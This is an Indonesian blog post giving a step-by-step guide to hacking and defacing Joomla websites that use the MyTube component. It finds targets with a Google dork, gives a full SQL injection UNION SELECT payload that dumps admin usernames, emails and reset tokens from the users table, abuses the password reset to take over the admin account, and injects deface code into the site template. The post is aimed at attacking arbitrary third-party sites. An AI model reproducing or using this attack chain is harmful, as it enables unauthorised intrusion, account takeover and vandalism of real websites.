CARA HACKING ATAU DEFACE WEB BERBASIS JOOMLA DENGAN TEKNIK “EXPLOIT MYTUBE”

Kali ini saya mau mebagi cara hacking yang mudah untuk diterapkan, namun dengan tingkat keberhasilan yang kecil

Diposting April 4,2019 in Other.

Sapto Cahyo
16 Teman 95 Orang membaca ini

CARA HACKING ATAU DEFACE WEB BERBASIS JOOMLA DENGAN TEKNIK EXPLOITMYTUBE

Kali ini saya mau mebagi cara hacking yang mudah untuk diterapkan, namun dengan tingkat keberhasilan yang kecil. Sebenarnya ada banyak sekali cara dalam hacking web berbasis joomla ini. Apalagi dari daftar dork yang ada. Oke, langsung aja

Menemukan Target dan Exploit

Exploitadalah sebuahkodeyang menyerangkeamanan komputersecara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Bisa juga dikatakan sebuahperangkat lunakyang menyerang kerapuhan keamanan (securityvulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyakpenelitikeamanankomputermenggunakanexploituntuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Caranya cukup mudah, masuk ke google.com lalu paste inurl:option=com_mytubelalu tekan enter. Pilih salah satu website yang anda inginkan. Sudah? lanjut ke tahap yang berikutnya.

Misalkan alamat web yang telah anda dapatkan adalahhttp://alamattarget.com/index.php?option=com_mytubeItemid=12 maka, tambahkan

view=videostype=memberuser_id=62+AND+1=2+UNION+SELECT+

0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,

0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+

jos_users+where+id=62

setelah angka 12 tadi, lalu tekan enter.

Jika sudah, maka akan tampil seperti berikut ini

Di situ, kita bisa melihat admin dan email si admin. Oke, selanjutnya buka tab baru, masuk kehttp://alamattarget.com/index.php?option=com_userview=resetini merupakan bentuk umum untuk me-reset password.

Kemudian masukan alamat email yang telah ditemukan tadi, lalu klik submit. Setelah itu, pindah ke tab awal, klik F5untuk me-refresh page, lalu tulisan ea044f8847 akan berubah, inilh tokennya. Nah, jika menemukan tanda $ setelah di refresh, maka teknik ini tidak bisa dijalankan dan anda harus mencari target lain. Jika sukses, maka lanjutkan ke tahap berikutnya.

Tahap berikutnya yaitu masuk ke login panel. Setelah memasukan token tadi, maka anda akan diminta memasukan password baru, disitulah anda memasukan password baru sesuai yang anda inginkan. setelah semua berjalan dengan lancar, maka yang harus anda lakukan adalah masuk kehttp://alamattarget.com/administratorini merupakan betuk umum dari login panel joomla.

Setelah itu, masuk keExtensions TemplateManager Default Template Name Edit HTML. Di bagian edit HTML ini, anda dapat memasukan kode deface, kemudian klik save, dan apply. Selesai.

Sapto Cahyo Artikel

Baca lebih lanjut.

Berita & Politik
May 5, 2019 | 123 Orang membaca ini

Berita & Politik
May 5, 2019 | 161 Orang membaca ini

Pendidikan
July 7, 2019 | 101 Orang membaca ini

Ekonomi & Perdagangan
May 5, 2019 | 210 Orang membaca ini

Perjalanan & Acara
July 7, 2019 | 43 Orang membaca ini